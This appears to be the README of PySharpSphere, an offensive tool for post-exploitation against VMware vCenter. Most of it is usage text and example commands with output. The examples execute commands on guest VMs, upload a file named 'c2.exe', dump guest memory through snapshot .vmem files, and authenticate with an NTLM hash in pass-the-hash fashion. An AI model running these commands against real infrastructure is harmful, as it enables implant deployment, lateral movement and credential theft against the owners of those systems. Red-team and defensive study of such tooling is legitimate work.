PySharpSphere - Inspired by SharpSphere, just another python version



Inspired by SharpSphere, just another python version.


python3 install


  • Support control both Linux and Windows system of virtual machines
  • Execute commands, upload files and dump memory on target guest OS
  • Use NTLM token to execute commands on guest Windows system

SharpSphere Guide

PySharpSphere Usage

usage: pySharpSphere [-h] [-H HOST] [-P PORT] [-u USER] [-p PASSWORD]
                     [-c CERT] [-k KEY] [-d DOMAIN]
                     {list,execute,upload,dump} ...

positional arguments:
    list                list virtual machines
    execute             execute command on target machine
    upload              upload file to target machine
    dump                dump memory of target machine

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  vCenter Server host
  -P PORT, --port PORT  vCenter Server port
  -u USER, --username USER
                        vCenter Server username
  -p PASSWORD, --password PASSWORD
                        vCenter Server password

0. List virtual machines

$ pysharpsphere -H -u [email protected] -p password list
[*] Retrieve virtual machines list ...
DataCenter    MoID     Name                           Power    OS                                         Tools         IP
------------  -------  -----------------------------  -------  -----------------------------------------  ------------  --------------
Datacenter    vm-1015  Windows Server 2012 (VC67)     Off      Microsoft Windows Server 2012 (64-bit)     Current
Datacenter    vm-1030  VMware vCenter Server 7.0U2b   On       Other 3.x or later Linux (64-bit)          Unmanaged
Datacenter    vm-1017  VMware vCenter Server 6.7U3l   Off      Other 3.x or later Linux (64-bit)          Unmanaged
Datacenter    vm-1020  Operation Machine (Windows 7)  On       Microsoft Windows 7 (64-bit)               Current

1. Execute commands on guest OS

$ pysharpsphere -H -u [email protected] -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[+] Process start successfully with PID 1200
[*] Program exited, retrieving output ...
[*] Command output:

2. Upload file to target virtual machine

$ pysharpsphere -H -u [email protected] -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe
[*] Retrieve virtual machines list ...
[*] Uploading file to VM 'vim.VirtualMachine:vm-1020' ...
[*] Sending file data ...
[+] Uploaded file to C:\c2.exe successfully

3. Dump memory of guest OS

$ pysharpsphere -H -u [email protected] -p password dump -t vm-1020
[*] Retrieve virtual machines list ...
[*] Finding snapshot on target machine vm-1020
[+] Found exists snapshot!
[*] Finding snapshot files ...
[*] Downloading .vmsn file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmsn
[*] Downloading .vmem file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmem

4. Execute commands on guest OS using NTLM

$ pysharpsphere -H -u [email protected] -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[*] Starting NTLM authentication ...
[+] Process start successfully with PID 2624
[*] Program exited, retrieving output ...
[*] Command output:
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